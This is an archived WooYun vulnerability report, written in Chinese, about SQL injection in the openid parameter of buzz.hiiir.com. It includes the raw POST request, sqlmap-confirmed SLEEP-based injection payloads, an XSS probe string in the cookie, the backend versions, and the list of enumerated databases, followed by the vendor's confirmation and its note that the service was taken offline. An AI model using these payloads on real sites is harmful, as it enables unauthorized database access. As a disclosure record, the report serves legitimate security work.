乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-26: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-23: 厂商已经修复漏洞并主动公开,细节向公众公开
RT
POST /User/confirmopenid/ HTTP/1.1Content-Length: 73Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://buzz.hiiir.com/Cookie: PHPSESSID=1220aae1u89t98vsfkr74fe9q3; _Timer=2; __utmt=1; __utma=112679063.348446717.1445834033.1445834033.1445834033.1; __utmb=112679063.2.10.1445834033; __utmc=112679063; __utmz=112679063.1445834033.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); __atuvc=1%7C43; __atuvs=562dacff6159b6b8000Host: buzz.hiiir.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*openid=*
openid参数存在注入
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: openid=');(SELECT * FROM (SELECT(SLEEP(5)))Tebi)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: openid=') AND (SELECT * FROM (SELECT(SLEEP(5)))GTDK) AND ('aBcF'='aBcF---web application technology: PHP 5.2.10back-end DBMS: MySQL 5.0.11
eb application technology: PHP 5.2.10back-end DBMS: MySQL 5.0.11available databases [8]:[*] Hiiir_Rss[*] Hiiir_Statistics[*] HiiirAdPower[*] HiiirHero[*] HiiirLog[*] HiiirRepl[*] HiiirTrack[*] information_schema
危害等级:高
漏洞Rank:15
确认时间:2015-10-26 18:17
此網站屬於公司早期服務,後續已經沒有再持續維護,但是我們仍然感謝您的回報,我們會儘快處理
2015-11-23:部分服務為公司早期服務且未來將暫停維運,目前已完成下線作業,再次感謝漏洞回報,以後將會持續加強內部管理流程